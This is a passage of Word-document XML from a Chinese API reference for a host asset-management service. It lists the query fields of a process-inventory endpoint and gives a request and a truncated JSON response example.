          <w:p w14:paraId="79F74D13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F54DACC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="155A988E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="776AD9DA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14162F8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="322A9AC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="277F7485" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FA5D1B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程启动时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C12A1A1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59347CE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DA780CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E053A1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1992B411" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>版本，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A87EC01" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61CF72D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E752AF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FFD7064" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58CD6426" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否root权限运行，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="06724C53" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B75D947" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>packageName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="631D3662" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72BC3347" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3908174A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>包名</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="78B80299" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69E6C8D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>packageVersions</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55B3E541" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="716EBFD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40C24AAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>包版本列表,仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3CDC5FE5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46489E6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>installedByPm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AF24C01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C5ABA19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FA2351C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否包安装进程 ,仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="40BEFC81" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D579D3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pids</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5538578C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D8371CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66B17413" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E7A6DA4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E9C783" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1897E6F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1683C395" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57F2F3A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程状态,仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5BB6A0C9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59CCFED9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2859B59B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1498CEEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45474F36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程路径（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="072B52E9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08431484" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1076C919" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="380D7FF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78F26C22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户名（Linux模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="26EC9BE5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2418602E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="562E8CA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52D657CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03F346B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户组名（模糊查询）,仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A6DE96B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E25699F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C51D2E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A14AF19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="168E415A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程名（模糊查询)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="462FBE78" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15A091E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startArgs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C0A1133" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3942B9E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FE2ADBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程启动参数（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E2B4933" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30AACBC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tty</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23583E07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B5056E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2421C264" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程启动的TTY（模糊查询），仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="55687283" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DA3FF53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3786C5CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="485F4195" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0963D17E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程描述（模糊查询），仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1260A7E8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22FDFE15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05093417" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D1FFC45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F1DB975" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程类型查询(其中：1-表示应用程序 2-表示后台程序 3-表示windows进程)），仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21162010" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D8C2CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/process/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5EB62D21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEE3218" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":39,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
